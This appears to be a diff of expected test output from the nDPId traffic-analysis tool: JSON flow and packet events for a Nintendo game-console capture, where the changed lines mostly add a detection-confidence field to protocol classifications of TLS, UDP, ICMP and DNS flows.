+01044{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1500731342849,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731342849,"pkt":"AA6OGXEMfLuKifuECABFAABoEaUAAAQRdQ7AqAxyuXapQdpra4AAVCIdMquYZAIAAADswAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4rX5hDUY6wfFQBAZE4XnJazusJzbVQnhevgQppjVzdvQ=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1500731342850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEaYAAAQRdQ3AqAxyuXapQdpra4AAVAI0MquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6gjif1bWs4geU7XixG1qL9vpm\/9BWOrfz2cCbEeSTC5w=="}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1500731342850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEacAAAQRdQzAqAxyuXapQdpra4AAVKPSMquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6PDZdQtmr\/jnYvUCnbuXCGD7lHXmsq3069ZX\/zt70P0A=="}
 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1500731342860,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAWRkAAAAARQAAaBGlAAABEXgOwKgMcrl2qUHaa2uAAFRVpg=="}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1500731342860,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAeQIAAAAARQAAaBGmAAABEXgNwKgMcrl2qUHaa2uAAFQ1vQ=="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1500731342860,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsA12MAAAAARQAAaBGnAAABEXgMwKgMcrl2qUHaa2uAAFTXWw=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1500731343061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343061,"pkt":"AA6OGXEMfLuKifuECABFAABoEawAAAQR9ebAqAxyXe2D69pr2wIAVCbFMquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4hx\/onxePqCY4SU3xjlxtsTZQnwdACOZdpevYKG6n8bw=="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1500731343062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343062,"pkt":"AA6OGXEMfLuKifuECABFAABoEa0AAAQR9eXAqAxyXe2D69pr2wIAVEC8MquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6trKJ4rbcL8S1NPouV27EIOISc3sHWS\/Ay6NZ9dnLpeA=="}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1500731343064,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343064,"pkt":"AA6OGXEMfLuKifuECABFAABoEa4AAAQR9eTAqAxyXe2D69pr2wIAVHIfMquYZAIAAADtmAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4QxoxAISmRWzt9Cf2ANrWvuCF9xJxAb2QUBmXaTP0ETQ=="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1500731343266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbUAAAQR5+7AqAxyUT2eitpryjkAVFv5MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5+fKxnOL+boQLScYxPZys77lNbziI76pb\/g4qlyspVqA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1500731343266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbYAAAQR5+3AqAxyUT2eitpryjkAVGj9MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+7xrfou4fqWjlJQi1c1lm8udR6QM9F6Tte6liKDWkKe\/w=="}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1500731343267,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731343267,"pkt":"AA6OGXEMfLuKifuECABFAABoEbcAAAQR5+zAqAxyUT2eitpryjkAVC1TMquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5Run8isLISlhuFklysgYAwVdq0TTDfSVfOsDm2ryNz2g=="}
 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1500731343274,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAwIMAAAAARQAAaBG1AAABEeruwKgMclE9noraa8o5AFSPgg=="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1500731343274,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAs38AAAAARQAAaBG2AAABEertwKgMclE9noraa8o5AFSchg=="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1500731343274,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsA7ykAAAAARQAAaBG3AAABEerswKgMclE9noraa8o5AFRg3A=="}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
